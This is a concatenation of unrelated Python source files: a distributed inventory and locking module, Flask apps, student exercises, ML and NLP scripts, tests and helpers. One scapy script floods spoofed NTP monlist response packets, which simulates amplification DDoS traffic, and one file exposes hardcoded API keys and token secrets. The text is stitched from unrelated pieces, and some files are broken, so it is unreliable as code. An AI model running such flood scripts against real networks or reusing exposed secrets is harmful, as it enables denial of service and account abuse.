def set_raw_object(self, root_key, sub_key, raw_obj):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
return False, 'sync base not ready'
try:
root_keeper.set(root_key, sub_key, raw_obj, True)
e3loger.info('set raw object for <%s,%s> as %s' %
(root_key, sub_key, raw_obj))
return True, None
except Exception as e:
e3loger.error('failed to set raw object for <%s,%s>' % (root_key,
sub_key))
return False, e
def get_raw_object(self, root_key, sub_key):
try:
obj, valid = root_keeper.get(root_key, sub_key)
return valid, obj if valid else 'not valid sub_key or something else gets wrong'
except Exception as e:
e3loger.error(
'failed to retrieve raw object <%s,%s> with exception:' %
(root_key, sub_key, str(traceback.format_exc())))
return False, e
def list_raw_objects(self, root_key):
ret = dict()
try:
sub_lst = root_keeper.list(root_key)
for sub_key in sub_lst:
ret[sub_key] = self.get_raw_object(root_key, sub_key)
return True, ret
except Exception as e:
e3loger.error(str(traceback.format_exc()))
return False, e
@replicated
def unset_raw_object(self, root_key, sub_key):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
return False, 'sync base not ready'
try:
root_keeper.unset(root_key, sub_key)
e3loger.info('unset raw object <%s,%s>' % (root_key, sub_key))
return True, None
except Exception as e:
e3loger.error(
'failed yo unset raw object <%s,%s> with exception:%s' %
(root_key, sub_key, str(traceback.format_exc())))
return False, e
#
#the non-replicated methods are stateful,
#usually a database operation is involved
#we use to_key() of the registered object to determine sub_key
#
def register_object(self,
root_key,
fields_create_dict,
user_callback=None,
user_sync=False,
user_timeout=30):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
raise e3_exception(E3_EXCEPTION_NOT_SUPPORT, 'sync base not ready')
try:
obj = dispatching_for_registery[root_key](fields_create_dict)
assert (obj)
e3loger.debug(
'invoking register_or_update_object_post for <%s:%s>' %
(root_key, obj))
self.register_or_update_object_post(
root_key,
obj.to_key(),
True,
callback=user_callback,
sync=user_sync,
timeout=user_timeout)
return obj
except Exception as e:
e3loger.error('with given root_key:%s and create_dict:%s' %
(str(root_key), str(fields_create_dict)))
e3loger.error(str(traceback.format_exc()))
raise e
def update_object(self,
root_key,
sub_key,
fields_change_dict,
user_callback=None,
user_sync=False,
user_timeout=30):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
raise e3_exception(E3_EXCEPTION_NOT_SUPPORT, 'sync base not ready')
try:
args = sub_key_to_args[root_key](sub_key)
args['fields_change_dict'] = fields_change_dict
dispatching_for_update[root_key](**args)
e3loger.debug(
'invoking register_or_update_object_post for <%s:%s>' %
(root_key, sub_key))
self.register_or_update_object_post(
root_key,
sub_key,
True,
callback=user_callback,
sync=user_sync,
timeout=user_timeout)
except Exception as e:
e3loger.error(
'with given root_key:%s sub_key:%s and fields_change_dict:%s' %
(str(root_key), str(sub_key), str(fields_change_dict)))
e3loger.error(str(traceback.format_exc()))
raise e
@replicated
def register_or_update_object_post(self, root_key, sub_key, success):
e3loger.debug('post registery call:<%s,%s> %s' % (root_key, sub_key,
success))
if success:
obj, valid = root_keeper.get(root_key, sub_key)
if valid:
root_keeper.invalidate(root_key, sub_key)
else:
root_keeper.set(root_key, sub_key, None, False)
def get_object(self, root_key, sub_key):
try:
obj, valid = root_keeper.get(root_key, sub_key)
if not valid:
obj = dispatching_for_retrieval[root_key](
**sub_key_to_args[root_key](sub_key))
#if the object can not be retrieved, an exception must be thrown
#anyway add an assertion here for sanity check purpose
assert (obj)
root_keeper.set(root_key, sub_key, obj, True)
return obj
except Exception as e:
e3loger.error('with given root_key:%s,sub_key:%s' % (str(root_key),
str(sub_key)))
e3loger.error(str(traceback.format_exc()))
raise e
def list_objects(self, root_key):
ret = dict()
sub_lst = root_keeper.list(root_key)
for sub_key in sub_lst:
try:
obj = self.get_object(root_key, sub_key)
ret[sub_key] = obj
except:
pass
return ret
'''
https://github.com/bakwc/PySyncObj/issues/76
here no known way to get the infomation
whether it's synchronous invocation or
whether the callback is set, to work this around, the user_ prefixed
callback and sync are introdduced,
often the caller should only specify user_callback instead callback,
and if conducting synchronuously this operation, specify both user_sync and sync
updates:do not use user_sync, this will cause errors
use user_callback instead of callback
'''
def unregister_object(self,
root_key,
sub_key,
user_callback=None,
user_sync=False,
user_timeout=30):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
raise e3_exception(E3_EXCEPTION_NOT_SUPPORT,
'synchronization state not ready')
try:
dispatching_for_deletion[root_key](
**sub_key_to_args[root_key](sub_key))
#if no exception thrown,things go normal
#try to invoke another post callback with the same manner
e3loger.debug('invoking unregister_object_post for<%s,%s>' %
(root_key, sub_key))
self.unregister_object_post(
root_key,
sub_key,
callback=user_callback,
sync=user_sync,
timeout=user_timeout)
except Exception as e:
e3loger.error('with given root_key:%s,sub_key:%s ' %
(str(root_key), str(sub_key)))
e3loger.error(str(traceback.format_exc()))
raise e
@replicated
def unregister_object_post(self, root_key, sub_key):
e3loger.debug('unset<%s,%s>' % (root_key, sub_key))
root_keeper.unset(root_key, sub_key)
#
#distributed lock implementation
#use caller's time to synchronize the lock, DO NOT use local tome,
#because different nodes' time do not be the same.
#this must be a LESSON, and use NTP service to synchronize the time to almost the same.
#
@replicated
def acquire_lock(self, lock_path, caller_id, current_time, lock_duration):
try:
self._lock_native_guard.write_lock()
lock = self._locks.get(lock_path, None)
lock_id = None
expiry_time = 0
#release previous in case of expiry
if lock:
lock_id, expiry_time = lock
if expiry_time < current_time:
lock = None
if not lock or lock_id == caller_id:
self._locks[lock_path] = (caller_id,
current_time + lock_duration)
else:
raise e3_exception(E3_EXCEPTION_NOT_SUCCESSFUL)
return True
except Exception as e:
e3loger.debug(
'failed to lock:%s as caller_id:%s with exception:%s' %
(lock_path, caller_id, str(e)))
return False
finally:
self._lock_native_guard.write_unlock()
#
#if no exception was raised, the lock_path is acquired,
#otherwise an E3_EXCEPTION_NOT_READY exception was thrown
def is_locked(self, lock_path, caller_id, current_time):
try:
self._lock_native_guard.read_lock()
lock = self._locks.get(lock_path, None)
if lock:
lock_id, expiry_time = lock
if lock_id == caller_id and expiry_time > current_time:
return True
raise e3_exception(E3_EXCEPTION_NOT_READY)
except:
return False
finally:
self._lock_native_guard.read_unlock()
#
#no exception is exposed
#it's is supposed to be always successful
#the returned value usually has significent meaning
@replicated
def release_lock(self, lock_path, caller_id):
try:
self._lock_native_guard.write_lock()
lock = self._locks.get(lock_path, None)
if not lock:
return False
lock_id, expiry_time = lock
if lock_id == caller_id:
del self._locks[lock_path]
return True
return False
except Exception as e:
return False
finally:
self._lock_native_guard.write_unlock()
invt_base = None
def e3inventory_base_init():
global invt_base
local_address = get_config(cluster_conf, 'cluster', 'local_address')
peer_addresses = get_config(cluster_conf, 'cluster', 'peer_addresses')
local = local_address.strip()
peer = list()
for addr in peer_addresses.split(','):
addr = addr.strip()
if addr == '':
continue
peer.append(addr)
e3loger.info(
'try to instantiate inventory service with local:%s and peer(s):%s' %
(local, peer))
invt_base = inventory_base(local, peer)
def get_inventory_base():
return invt_base
if __name__ == '__main__':
from e3net.common.e3config import add_config_file
from e3net.common.e3config import load_configs
add_config_file('/etc/e3net/e3vswitch.ini')
load_configs()
e3inventory_base_init()
'''
from e3net.db.db_base import init_database
from e3net.db.db_base import create_database_entries
DB_NAME='E3NET_VSWITCH'
init_database(DB_NAME,'mysql+pymysql://e3net:e3credientials@localhost/E3NET_VSWITCH',False)
base=inventory_base('localhost:507',[])
import time
while True:
time.sleep(1)
arg=dict()
arg['ip']='130.140.150.1'
arg['hostname']='server'
print(base.register_object('vswitch_host','container_host1',**arg))
'''
|
import os
from flask import Flask, request, jsonify
app = Flask(__name__)
@ app.route('/')
def hello_world():
return 'Hello World from Flask!'
port = int(os.getenv('PORT', 8000))
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=port)
|
from math import ceil
while True:
n = int(input())
if n == 0:
break
if n != 1:
temp = n / 3
corridas = ceil(temp)
while temp > 1:
temp /= 3
corridas += ceil(temp)
print(corridas)
else:
print(0)
|
#!/usr/bin/python
from scapy.all import Ether, IP, sendp, get_if_hwaddr, get_if_list, TCP, Raw, UDP, NTP, fuzz
import sys
import time
import random, string
import socket
import fcntl
import struct
def randomword(max_length):
length = random.randint(1, max_length)
return ''.join(random.choice(string.lowercase) for i in range(length))
def set_payload(length):
return ''.join(random.choice(string.lowercase) for i in range(length))
def gen_random_ip():
ip = ".".join(map(str, (random.randint(0, 255) for _ in range(4))))
return ip
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def send_random_traffic(src_switch, src_host, dst_switch, dst_host, timeout, loop):
NTP_ITEMS = "\x06"
NTP_ITEMS_INT = 6
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT
src_host_in_hex = '{:02x}'.format(int(src_host))
dst_host_in_hex = '{:02x}'.format(int(dst_host))
src_mac = '00:00:00:00:0' + src_switch + ':' + src_host_in_hex
src_ip = '10.0.' + src_switch + '.' + src_host
dst_mac = '00:00:00:00:0' + dst_switch + ':' + dst_host_in_hex
dst_ip = '10.0.' + dst_switch + '.' + dst_host
print 'From:\n ' + src_mac
print ' ' + src_ip
print 'To:\n ' + dst_mac
print ' ' + dst_ip
# Get name of eth0 interface
iface_eth0 = ''
for i in get_if_list():
if 'eth0' in i or 's0' in i:
iface_eth0 = i
while True:
# Send with 20 packages with 6 items each = 60 items * 72 bytes = 4320 data bytes
p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip)
p = p/UDP(dport=123,sport=123)/Raw(NTP_MONLIST_RESPONSE)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
sendp(p, iface = iface_eth0, loop=loop, verbose=0)
time.sleep(timeout)
if __name__ == '__main__':
if len(sys.argv) < 6:
print("Usage: python send.py src_switch src_host dst_switch dst_host time [loop]<0|1>")
sys.exit(1)
else:
src_switch = sys.argv[1]
if 's' in src_switch:
src_switch = sys.argv[1].split('s')[1]
src_host = sys.argv[2]
if 'h' in src_host:
src_host = sys.argv[2].split('h')[1]
dst_switch = sys.argv[3]
if 's' in dst_switch:
dst_switch = sys.argv[3].split('s')[1]
dst_host = sys.argv[4]
if 'h' in dst_host:
dst_switch = sys.argv[4].split('h')[1]
timeout = float(sys.argv[5])
loop = 1
if len(sys.argv) > 6:
loop = int(sys.argv[6])
send_random_traffic(src_switch, src_host, dst_switch, dst_host, timeout, loop)
|
#!/usr/bin/env python3
from loadCOLOR import load_color
from LOGClassify import log_energy, log_classify
# could really just use pickle here instead of numpy
import numpy
from viewCLASSES import view_classes
img, X, Xtrain, y = load_color()
lambdapickles = [ ( .005,'color_005.pickle'),
(.05, 'color_05.pickle'),
(.5, 'color_5.pickle'),
]
energy_lines = []
for lamb, picklefile in lambdapickles:
try:
*beta, alpha = numpy.load(picklefile)
except FileNotFoundError:
print("no pickle :(")
# the pickle doesn't exist, so make it
alpha, beta = log_classify(Xtrain, y, lamb)
to_pickle = list(beta) + [alpha]
to_pickle = numpy.array(to_pickle)
to_pickle.dump(picklefile)
print("made pickle")
beta = numpy.array(beta)
E = log_energy(alpha, beta, Xtrain, y, lamb)
energy_lines.append('λ={}\t'.format(lamb))
#print('found α: {}'.format(alpha))
#print('found β: {}'.format(beta))
energy_lines.append("final energy is {}\n".format(E))
Y = alpha + numpy.dot(X,beta)
view_classes(img,Y,lamb,save=True)
with open('c3_1.txt', 'w') as f:
f.writelines(energy_lines)
|
import pytest
from PlayerRepository import PlayerRepository
from gamecomponents import PlayerInfo
repo = None
p1, p2 = None, None
@pytest.fixture(autouse=True)
def initPlayers():
global repo, p1, p2
p1, p2 = PlayerInfo("1"), PlayerInfo("2")
p1.sigma = 3
p2.sigma = 5
repo = PlayerRepository()
repo.setPlayers([p1, p2])
def test_remove_worst_players_too_low_sigma():
removed = repo.removeWorstPlayers(quantile=1, minSigma=2)
assert len(removed) == 0
assert len(repo.fetchPlayers()) == 2
def test_remove_worst_players_too_middle_sigma():
removed = repo.removeWorstPlayers(quantile=1, minSigma=4)
assert len(removed) == 1
assert len(repo.fetchPlayers()) == 1
def test_remove_worst_players_too_big_sigma():
removed = repo.removeWorstPlayers(quantile=1, minSigma=6)
assert len(removed) == 2
assert len(repo.fetchPlayers()) == 0
def test_remove_worst_players_too_big_sigma_but_limited_amount_should_remove_worst_player():
p1.rank = 30
p2.rank = 40
removed = repo.removeWorstPlayers(quantile=0.5, minSigma=6)
assert len(removed) == 1
assert len(repo.fetchPlayers()) == 1
assert repo.fetchPlayers() == [p2]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by weihang huang on 17-11-18
import sys
import os
import numpy as np
from collections import Counter
reload(sys)
sys.setdefaultencoding('utf-8')
root = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/"
def create_dataset(in_file, max_size):
sent_line, tag_line = [], []
for line in open(in_file, 'r'):
sent_tag = line.split("__content__")
sent_line.append(sent_tag[1].strip())
tag_line.append(sent_tag[0].strip())
sent_vocab_dict = Counter(word for sentence in sent_line for word in sentence.split())
tag_vocab_dict = Counter(word for sentence in tag_line for word in sentence.split())
sent_vocab_cnt = map(lambda x: (x[0], x[1]), sorted(sent_vocab_dict.items(), key=lambda x: -x[1]))
sent_vocab_cnt = filter(lambda x: x[1] >= max_size, sent_vocab_cnt)
tag_vocab_cnt = map(lambda x: (x[0], x[1]), sorted(tag_vocab_dict.items(), key=lambda x: -x[1]))
sent_vocab = map(lambda x: x[0], sent_vocab_cnt)
tag_vocab = map(lambda x: x[0], tag_vocab_cnt)
start_idx = 2
sent_word2idx = dict([(word, idx + start_idx) for idx, word in enumerate(sent_vocab)])
sent_word2idx['<ukn>'] = 0
sent_word2idx['<pad>'] = 1
sent_idx2word = dict([(idx, word) for word, idx in sent_word2idx.iteritems()])
tag_word2idx = dict([(word, idx) for idx, word in enumerate(tag_vocab)])
tag_idx2word = dict([(idx, word) for word, idx in tag_word2idx.iteritems()])
x = [[sent_word2idx.get(word, 0) for word in sentence.split()] for sentence in sent_line]
y = [[tag_word2idx.get(word) for word in sentence.split()] for sentence in tag_line]
# for sent,tag in zip(x,y):
# print " ".join([sent_idx2word.get(word) for word in sent])
# print " ".join([tag_idx2word.get(tta) for tta in tag])
# for k,v in sent_word2idx.items():
# print k,v
return x, y, sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx, tag_idx2word, tag_vocab
# load data with word dictionary
def load_data(in_file, zh_word2idx, en_word2idx):
sent_line, tag_line = [], []
for line in open(in_file, 'r'):
sent_tag = line.split("__content__")
each = []
for word in sent_tag[1].strip().split():
each.append(sent_word2idx.get(word, 0))
sent_line.append(each)
each = []
for tta in sent_tag[0].strip().split():
each.append(tag_word2idx[tta])
tag_line.append(each)
return sent_line, tag_line
def data_padding(x, y, sent_word2idx, tag_word2idx, length=15):
classes = len(tag_word2idx)
for i in range(len(x)):
if len(x[i]) >= length:
x[i] = x[i][:length]
else:
x[i] = x[i] + (length - len(x[i])) * [sent_word2idx['<pad>']]
tag_vec = [0] * classes
for tag in y[i]:
tag_vec[tag] = 1
y[i] = tag_vec
if __name__ == '__main__':
length = 30
max_size = 4
train_file = root + "datasets/text/wangke/train.txt"
test_file = root + "datasets/text/wangke/test.txt"
X_train, Y_train, sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx, tag_idx2word, tag_vocab = create_dataset(
train_file,max_size=max_size)
X_test, Y_test = load_data(test_file, sent_word2idx, tag_word2idx)
data_padding(X_train, Y_train, sent_word2idx, tag_word2idx, length=length)
data_padding(X_test, Y_test, sent_word2idx, tag_word2idx, length=length)
for sent, tag in zip(X_train, Y_train):
print(" ".join([sent_idx2word[word] for word in sent]))
ts = []
for i, tta in enumerate(tag):
if tta:
ts.append(i)
print(" ".join([tag_idx2word[ttaS] for ttaS in ts]))
print("nb_trains: ",len(X_train))
print("nb_tests: ",len(X_test))
print("nb_classes: ",len(tag_vocab))
# for key,tag in tag_idx2word.items():
# print key,tag
# for x in X_train:
# print len(x)
X_train = np.asarray(X_train, dtype=np.int)
Y_train = np.asarray(Y_train, dtype=np.int)
X_test = np.asarray(X_test, dtype=np.int)
Y_test = np.asarray(Y_test, dtype=np.int)
np.save(root + 'datasets/text/wangke/pack.npz', np.array([X_train, Y_train, X_test, Y_test,
sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx,
tag_idx2word, tag_vocab]))
|
#!/usr/bin/env python3
API_Key = "i3BgiDWeRDGgx1MieH5pfsQdI"
API_Secret = "W3tQRuhqBhYCm2PSezofEb0N069DNOT2r36LZzdAOQW29FdWwy"
token: '616379578-w3ElYEoF40uO4GyW0KoMAnzM0SG9lhiWhVsY0aj3'
secret: 'nY86GsXMNmttcivMlYJ1iWnqFWhcBsWgLbFbdF5vln9Jz' |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# a0 a1 a2 a3 a4
# a = [1, 11, 21, 1211, 111221,
#1個の1
#2個の1
#1個の2,1個の1
#1個の1,1個の2、2個の1
#3個の1,2個の1,1個の1
from itertools import groupby
# 参考
# http://stackoverflow.com/questions/6972764/python-look-and-say-sequence-improved
def lookandsay(n):
return ''.join( str(len(list(g))) + k for k, g in groupby(n))
n='1'
print "len(",0,")=" ,len(n)
for i in range(1,31):
n = lookandsay(n)
print "len(", i, ")=" ,len(n)
|
# -*- coding: utf-8 -*-
"""
OCR 数据读入添加数据的绝对路径
@author: libo
"""
labelPath = 'D:/work_xinhuo/txt_add_path/txt/test.txt'
imgPath = 'D:/work_xinhuo/txt_add_path/img/'
labelPath2 = 'D:/work_xinhuo/txt_add_path/txt/test_add.txt'
with open(labelPath, 'r', encoding='utf-8') as f:
file_names = f.readlines()
print('-----------------', file_names[0:2]) # 左闭右开
file_names2 = []
for strName in file_names:
strName2 = imgPath + strName
file_names2.append(strName2)
with open(labelPath2, 'w') as w:
w.writelines(file_names2)
print('=================', file_names2) |
from collections import OrderedDict
from pprint import pprint
from contextlib import contextmanager
import os
import pickle
from flask import Flask, request, abort, jsonify
from flask_cors import CORS
from werkzeug.exceptions import HTTPException
import dotenv
import redis
# Grab the .env values to use globably in this module if they are not already in the environment.
dotenv.load_dotenv()
REDIS_URL = os.environ['REDIS_URL']
DEBUG = os.environ.get('DEBUG')
POOL = 30
FIELDS = ("attack", "defense", "hps", "speed")
app = Flask(__name__)
CORS(app, headers='Content-Type')
@app.route('/match', methods=['POST', 'OPTIONS'])
def match():
# Post your own stat to the queue if you haven't yet done so.
# Grab the oldest post that is not your own and remove it.
if request.method == 'OPTIONS':
return ""
stats = request.json
if not stats:
abort(422, description='json required')
stats = verify_and_intify(stats)
if stats is None:
abort(422, description='invalid stats')
store = Store()
with store.get_queue() as queue:
if queue is None:
return jsonify({'success': False})
if queue.is_new(stats):
queue.push(stats)
if DEBUG:
queue.print()
opponent = queue.pop_opponent(stats['name'])
store.store_queue(queue)
if not opponent:
return jsonify({'success': False})
return jsonify({'success': True, 'villain': opponent})
def verify_and_intify(stats, fields=FIELDS):
if not "name" in stats and not "id" in stats:
return None
if not all(f in stats for f in fields):
return None
if not all(stats[f].isdigit() for f in fields):
return None
# the intify part
for f in fields:
stats[f] = int(stats[f])
if not sum(stats[f] for f in fields) == POOL:
return None
if not all(stats[f] >= 0 for f in fields):
return None
if stats['attack'] < 1 or stats['hps'] < 1:
return None
return stats
@app.errorhandler(HTTPException)
def error_handler(error):
return jsonify({
'success': False,
'description': error.description,
'name': error.name,
'status_code': error.code
}), error.code
class Store:
def __init__(self):
self.redis = redis.from_url(REDIS_URL)
@contextmanager
def get_queue(self):
acquired = False
try:
lock = self.redis.lock('key', blocking_timeout=1)
acquired = lock.acquire()
if not acquired:
queue = None
else:
# Create a new queue if it's not in the redis database
pickled = self.redis.get('queue') or pickle.dumps(Queue())
queue = pickle.loads(pickled)
yield queue
finally:
if acquired:
lock.release()
def store_queue(self, queue):
self.redis.set('queue', pickle.dumps(queue))
class Queue:
MAX_USED = 100
MAX_QUEUE = 100
def __init__(self):
self.data = OrderedDict()
self._used = set()
def is_new(self, entry):
return entry['id'] not in self._used
def push(self, entry):
# The method I'm using probablly doesn't scale well so
# let's not let this object get too big.
if len(self.data) > self.MAX_QUEUE:
self.data.popitem(False) # removes the oldest item
if len(self._used) > self.MAX_USED:
self._used = set()
self.data[entry['id']] = entry
self._used.add(entry['id'])
def pop_opponent(self, name):
"""
Remove and return the oldest post with a different name.
"""
for key, entry in self.data.items():
if entry['name'] != name:
return self.data.pop(key)
return None
def print(self):
print('data:')
pprint(self.data)
print('used:')
pprint(self._used)
|
#!/usr/bin/env python
"""
------------------------------------------------------------------------------
COPYRIGHT: Copyright (c) 200x - 2010, Greenplum Inc. All rights reserved.
PURPOSE:
LAST MODIFIED:
------------------------------------------------------------------------------
"""
#disable deprecationwarnings
import warnings
warnings.simplefilter('ignore', DeprecationWarning)
import unittest, os, popen2, time, sys, getopt, StringIO, string, platform, datetime, subprocess
MYD = os.path.abspath(os.path.dirname(__file__))
mkpath = lambda *x: os.path.join(MYD, *x)
if MYD in sys.path:
sys.path.remove(MYD)
sys.path.append(MYD)
# ============================================================================
class Shell:
def __init__(self):
self.lastcmd = ''
def run(self, cmd, oFile=None, mode = 'a', cmdtype="cmd"):
"""
Run a shell command. Return (True, [result]) if OK, or (False, []) otherwise.
@params cmd: The command to run at the shell.
oFile: an optional output file.
mode: What to do if the output file already exists: 'a' = append;
'w' = write. Defaults to append (so that the function is
backwards compatible). Yes, this is passed to the open()
function, so you can theoretically pass any value that is
valid for the second parameter of open().
@change: 2010-04-11 mgilkey
I added an optional parameter to the function to allow the
caller to specify whether to append to an existing file or
overwrite if there is an existing file.
"""
self.lastcmd = cmd
p = os.popen(self.lastcmd)
ret = []
fp = None
if oFile: #if oFile provided then append (or write) the results of the cmd
#to the file
fp = open(oFile, mode)
for line in p:
ret.append(line)
if fp:
fp.write(line)
rc = p.close()
if fp:
fp.close()
return (not rc, ret)
def killall(self, procname):
#Anu: removed the path for pkill from /bin/pkill to pkill - assuming that pkill is always in the path.
cmd = "bash -c 'pkill %s || killall %s' > /dev/null 2>&1" % (procname, procname)
return self.run(cmd)
def getFilePath(self,cmd,key="sql"):
cmdArr = cmd.split(" ")
for val in cmdArr:
if val.find(key,2)>0:
return val
return "cmd-error"
# Run Shell execution with Timeout
# Currently, it's checking only for PSQL. We should try to generalize for all shell
def run_timeout(self,cmd,timeout=900,raiseError=True,getPstack=True):
# To help with filerep debugging take the timeout out of picture
timeout=0
# If psql "-c" option, runs with no timeout
# Also check for spaces in between -c.
if(cmd.find("psql")>=0 and cmd.find(" -c ")>0):
return self.run(cmd)
else:
process = subprocess.Popen(cmd, env=None, shell=True, executable='/bin/bash',stdout=subprocess.PIPE,stderr=subprocess.PIPE)
if timeout>0:
start = datetime.datetime.now()
while process.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
"""
TODO: Need to refactor this from cdbfastUtil
sqlFile = self.getFilePath(cmd)
collectStackTraces(sqlFile)
collectResourceUsage(sqlFile)
checkDeadlock(sqlFile)
"""
# Using send_signal(2) seems to let the process finish. Using kill instead
# process.send_signal(2) #Send interrupt to the parent gptorment process
# process.kill() # equivalent to kill SIGKILL (-9)
process.terminate() # equivalent to kill SIGTERM (-2)
os.waitpid(process.pid,0)
# If raiseError is True, will throw an exception so exit out the Test Case
# Sometimes, we just want to timeout the command execution, so return False instead of exception
if raiseError:
raise GPTestError('GPTimeout')
return (False,["Timeout"])
# Fix issues with long-running loop, python is not cleaning up the process
pmsg = process.communicate()[0]
if process.returncode == None:
process.terminate()
return (True,[pmsg])
def run_in_loop(self, cmd, loop=0, msg="Error in loop"):
"""
Run in a loop and exit if there is an exception
@cmd: Command
@loop_count: Loop Count, default=0 is infinite
@msg: Error Message
@todo: Add a condition as a parameter that execute a process or function
that returns True or False
"""
try:
counter = 1
while True:
if loop != 0 and (counter > loop) == True:
break
self.run(cmd)
counter += 1
except:
print traceback.print_exc()
self.fail(msg)
shell = Shell()
|
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import logging
# Libs
# Custom
from .collaborations import CollaborationTask
from .projects import ProjectTask
from .experiments import ExperimentTask
from .runs import RunTask
from .participants import ParticipantTask
from .registrations import RegistrationTask
from .tags import TagTask
from .alignments import AlignmentTask
from .models import ModelTask
from .optimizations import OptimizationTask
from .validations import ValidationTask
from .predictions import PredictionTask
##################
# Configurations #
##################
###################################
# Task Interfacing Class - Driver #
###################################
class Driver:
""" Main wrapper class that consolidates all tasks under a single
abstraction layer.
Attributes:
host (str): IP where Synergos TTP are hosted at
port (int): Port where Synergos TTP REST service is hosted on
is_secured (bool): Toggles whether a secured connection is used
(i.e. HTTPS if True, HTTP if False)
"""
def __init__(self, host: str, port: int, is_secured: bool = False):
self.host = host
self.port = port
self.is_secured = is_secured
@property
def address(self):
if self.is_secured:
return f"https://{self.host}:{self.port}"
else:
return f"http://{self.host}:{self.port}"
@property
def collaborations(self):
return CollaborationTask(address=self.address)
@property
def projects(self):
return ProjectTask(address=self.address)
@property
def experiments(self):
return ExperimentTask(address=self.address)
@property
def runs(self):
return RunTask(address=self.address)
@property
def participants(self):
return ParticipantTask(address=self.address)
@property
def registrations(self):
return RegistrationTask(address=self.address)
@property
def tags(self):
return TagTask(address=self.address)
@property
def alignments(self):
return AlignmentTask(address=self.address)
@property
def models(self):
return ModelTask(address=self.address)
@property
def optimizations(self):
return OptimizationTask(address=self.address)
@property
def validations(self):
return ValidationTask(address=self.address)
@property
def predictions(self):
return PredictionTask(address=self.address)
if __name__ == "__main__":
host = "0.0.0.0"
port = 5000
driver = Driver(host=host, port=port)
# Create project
driver.projects.create(
project_id="test_project",
action="classify",
incentives={
'tier_1': [],
'tier_2': [],
'tier_3': []
}
)
# Create experiment
driver.experiments.create(
project_id="test_project",
expt_id="test_experiment",
model=[
{
"activation": "sigmoid",
"is_input": True,
"l_type": "Linear",
"structure": {
"bias": True,
"in_features": 15, # Arbitrary, will replaced dynamically
"out_features": 1 # Arbitrary, will replaced dynamically
}
}
]
)
# driver.experiments.create(
# project_id="test_project",
# expt_id="test_experiment",
# model=[
# {
# "activation": "sigmoid",
# "is_input": True,
# "l_type": "Linear",
# "structure": {
# "bias": True,
# "in_features": 15,
# "out_features": 1
# }
# }
# ]
# )
# Create run
driver.runs.create(
project_id="test_project",
expt_id="test_experiment",
run_id="test_run",
rounds=2,
epochs=1,
base_lr=0.0005,
max_lr=0.005,
criterion="NLLLoss"#"BCELoss"
)
# Create participant(s)
driver.participants.create(
participant_id="test_participant_1",
host='172.17.0.2',
port=8020,
f_port=5000,
log_msgs=True,
verbose=True
)
driver.participants.create(
participant_id="test_participant_2",
host='172.17.0.3',
port=8020,
f_port=5000,
log_msgs=True,
verbose=True
)
# Create registration(s)
driver.registrations.create(
project_id="test_project",
participant_id="test_participant_1",
role="guest"
)
driver.registrations.create(
project_id="test_project",
participant_id="test_participant_2",
role="host"
)
# Create tag(s)
driver.tags.create(
project_id="test_project",
participant_id="test_participant_1",
train=[
# ["non_iid_1"],
# ["edge_test_missing_coecerable_vals"],
["edge_test_misalign"],
["edge_test_na_slices"]
],
evaluate=[["iid_1"]]
)
driver.tags.create(
project_id="test_project",
participant_id="test_participant_2",
train=[["non_iid_2"]]
)
# driver.tags.create(
# project_id="test_project",
# participant_id="test_participant_1",
# train=[['train']],
# evaluate=[["evaluate"]]
# )
# driver.tags.create(
# project_id="test_project",
# participant_id="test_participant_2",
# train=[['train']],
# evaluate=[["evaluate"]]
# )
# Create alignment(s)
driver.alignments.create(project_id="test_project")
# Create model(s)
model_resp = driver.models.create(
project_id="test_project",
expt_id="test_experiment",
run_id="test_run"
)
print(f"Model response: {model_resp}")
# Perform validation(s)
valid_resp = driver.validations.create(
project_id="test_project",
expt_id="test_experiment",
run_id="test_run"
)
print(f"Validation response: {valid_resp}")
# Perform prediction(s)
pred_resp = driver.predictions.create(
tags={"test_project": [["iid_1"]]},
participant_id="test_participant_1",
project_id="test_project",
expt_id="test_experiment",
run_id="test_run"
)
# # Perform prediction(s)
# pred_resp = driver.predictions.create(
# tags={"test_project": [["predict"]]},
# participant_id="test_participant_1",
# project_id="test_project",
# expt_id="test_experiment",
# run_id="test_run"
# )
print(f"Prediction response: {pred_resp}") |
vet = []
n = (input('Insira um valor no vetor (1)'))
menor1 = float(n)
menor2 = float(n)
for i in range(4):
vet.append(n)
n = float((input('Insira um valor no vetor ({})' .format(i+2))))
if(menor1>n):
menor2 = menor1
menor1 = n
input('O menor número é {} e o segundo menor é {}' .format(menor1,menor2))
|
from rest_framework import serializers
from apps.authentication.models import CustomUser
from datetime import datetime, date
from apps.setup.models import MyFile
class MyFileSerializer(serializers.ModelSerializer):
name = serializers.CharField(required=True)
description = serializers.CharField(required=False)
filepath = serializers.CharField(required=True)
updated_by = serializers.CharField(required=False)
uuid = serializers.UUIDField(required=True)
class Meta:
model = MyFile
fields = ('__all__')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.